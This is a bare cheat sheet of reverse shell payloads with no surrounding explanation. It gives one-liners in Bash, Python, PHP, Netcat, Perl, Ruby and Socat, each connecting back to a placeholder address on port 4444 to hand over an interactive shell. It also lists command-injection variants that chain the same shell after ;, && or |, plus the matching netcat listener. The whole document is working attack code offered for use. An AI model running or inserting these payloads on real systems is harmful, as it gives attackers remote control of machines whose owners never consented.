Reverse Shell Payload List

[Bash]
bash -i >& /dev/tcp/YOUR_IP/4444 0>&1
/bin/bash -i >& /dev/tcp/YOUR_IP/4444 0>&1
bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'

[Python]
python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("bash")'
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

[PHP]
php -r '$sock=fsockopen("YOUR_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r 'system("bash -c \"bash -i >& /dev/tcp/YOUR_IP/4444 0>&1\"");'

[Netcat]
nc -e /bin/bash YOUR_IP 4444
nc -e /bin/sh YOUR_IP 4444
mkfifo /tmp/f; nc YOUR_IP 4444 < /tmp/f | /bin/sh > /tmp/f 2>&1; rm /tmp/f

[Perl]
perl -e 'use Socket;$i="YOUR_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'

[Ruby]
ruby -rsocket -e'f=TCPSocket.open("YOUR_IP",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

[Socat]
socat TCP:YOUR_IP:4444 EXEC:/bin/bash

[Command Injection]
; bash -i >& /dev/tcp/YOUR_IP/4444 0>&1
&& bash -i >& /dev/tcp/YOUR_IP/4444 0>&1
| bash -i >& /dev/tcp/YOUR_IP/4444 0>&1

[Listener]
nc -lvnp 4444
